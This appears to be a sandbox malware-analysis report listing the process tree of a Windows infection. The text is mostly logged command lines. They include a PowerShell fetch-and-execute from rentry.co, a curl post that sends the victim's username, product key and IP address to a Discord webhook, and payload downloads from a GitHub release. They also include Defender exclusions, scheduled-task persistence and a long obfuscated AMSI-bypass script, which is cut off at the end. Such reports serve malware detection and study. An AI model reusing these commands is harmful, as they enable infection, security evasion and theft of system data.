| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\ApplicationFrameHost.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\x4V5.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Virus.cmd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm rentry.co/_setup/raw | iex
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Public\uninstaller.bat"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\winlog32.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -WindowStyle Hidden -Command ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mountvol | find ":\"
C:\Windows\system32\mountvol.exe
mountvol
C:\Windows\system32\find.exe
find ":\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c add-mppreference -exclusionpath C:\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c add-mppreference -exclusionpath F:\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c add-mppreference -exclusionpath D:\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic csproduct get uuid /value | find /i "uuid="
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid /value
C:\Windows\system32\find.exe
find /i "uuid="
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault" | findstr /ri "REG_SZ"
C:\Windows\system32\reg.exe
reg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault"
C:\Windows\system32\findstr.exe
findstr /ri "REG_SZ"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl --silent icanhazip.com
C:\Windows\system32\curl.exe
curl --silent icanhazip.com
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -ks "https://rentry.co/cbkt9fio/raw"
C:\Windows\system32\curl.exe
curl -ks "https://rentry.co/cbkt9fio/raw"
C:\Windows\system32\curl.exe
curl -H "Content-Type: application/json" -d "{\"username\": \"TrollSec\", \"embeds\": [{\"title\": \"Enemey Down\", \"color\": 1, \"fields\": [{\"name\": \"Enemey Informations :\", \"value\": \" ```Admin/UJHKQCDS``` **Unique Identifier** `````` **Product Key** ```YC7N8-G7WR6-9WR4H-6Y2W4-KBT6X``` **IP Address** ```191.101.209.39``` \"}],\"thumbnail\":{\"url\": \"\"}, \"footer\":{\"text\": \"17:07:55.18/Fri 06/21/2024\"}}]}" https://discord.com/api/webhooks/1247862642509484092/vR90Kb-l3UPi2-9HRZ2fJ7o7Q0EBnbyiLGfvtKGN75kUdsj5C5BQ0HaTzj15zyWZuFsZ
C:\Windows\system32\curl.exe
Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/uninstaller" --output "C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"
C:\Windows\system32\curl.exe
Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/winhlp32.ex" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"
C:\Windows\system32\curl.exe
Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/x4joex.exe" --output "C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"
C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe
"C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe
"C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe"
C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe
"C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'
C:\ProgramData\x4V5.2.exe
"C:\ProgramData\x4V5.2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Shellcode.exe'
C:\ProgramData\x4Shellcode.exe
"C:\ProgramData\x4Shellcode.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xjeLFlXJvxoT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BgqrkrvyFKyuUC,[Parameter(Position=1)][Type]$mHOHrtAtbI)$tyEVppdzzpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+[Char](101)+'d'+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$tyEVppdzzpa.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+'p'+''+'e'+''+[Char](99)+'i'+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',M'+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$tyEVppdzzpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+'H'+[Char](105)+''+'d'+'eB'+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$mHOHrtAtbI,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $tyEVppdzzpa.CreateType();}$XvNsKxOuZSUXC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+'dll')}).GetType('M'+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+'f'+'t'+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+'s'+'a'+[Char](102)+''+'e'+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'h'+'o'+''+[Char](100)+'s');$ZmpTZzwfgWUUhb=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'oc'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OnYMlqRfuVuNKBPJRLT=xjeLFlXJvxoT @([String])([IntPtr]);$hGxWaomfUCSBCKIuthHHip=xjeLFlXJvxoT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SvHQLalbNuG=$XvNsKxOuZSUXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$FMPRuWkRraqNqN=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$PtaUzRiaDWdDVxtcq=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$SvHQLalbNuG,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$znjogQI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FMPRuWkRraqNqN,$OnYMlqRfuVuNKBPJRLT).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kJOkllUHVpOiOiyoM=$ZmpTZzwfgWUUhb.Invoke($Null,@([Object]$znjogQI,[Object](''+[Char](65)+'m'+'s'+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$knRNvBfrBw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,4,[ref]$knRNvBfrBw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kJOkllUHVpOiOiyoM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PtaUzRiaDWdDVxtcq,$hGxWaomfUCSBCKIuthHHip).Invoke($kJOkllUHVpOiOiyoM,[uint32]8,0x20,[ref]$knRNvBfrBw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('x'+'4'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a0b03bef-0f70-49e4-93e4-31bbeeeee3d6}
C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe
"C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"
C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe
"C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"
C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe
"C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4V5.2.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\x4Malicious'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4Malicious'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x4Joex1" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe" /RL HIGHEST
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "Malicious" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe" /RL HIGHEST
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4Malicious" /tr "C:\Users\Admin\x4Malicious"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'
C:\ProgramData\x4V5.2.exe
"C:\ProgramData\x4V5.2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Shellcode.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe'
C:\ProgramData\x4Shellcode.exe
"C:\ProgramData\x4Shellcode.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DEoEBGJjiChX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uOoTGwaAgywXvz,[Parameter(Position=1)][Type]$AGuOKAYXqA)$RmXwndVcdnP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+[Char](99)+'te'+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+[Char](109)+'o'+[Char](114)+'y'+'M'+''+'o'+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+'la'+[Char](115)+''+[Char](115)+''+','+''+'A'+'uto'+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$RmXwndVcdnP.DefineConstructor('RT'+[Char](83)+''+'p'+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uOoTGwaAgywXvz).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+'d');$RmXwndVcdnP.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+'S'+'ig'+','+''+[Char](78)+'e'+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+'a'+'l',$AGuOKAYXqA,$uOoTGwaAgywXvz).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+'ge'+[Char](100)+'');Write-Output $RmXwndVcdnP.CreateType();}$XGNzFszxOfdtL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'hod'+[Char](115)+'');$uqvipmuGFvoYqY=$XGNzFszxOfdtL.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+'S'+'t'+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eHuKsvmAVPIIiRnVQsw=DEoEBGJjiChX @([String])([IntPtr]);$zVZKtbqIDcbtSGwsaNpBbj=DEoEBGJjiChX 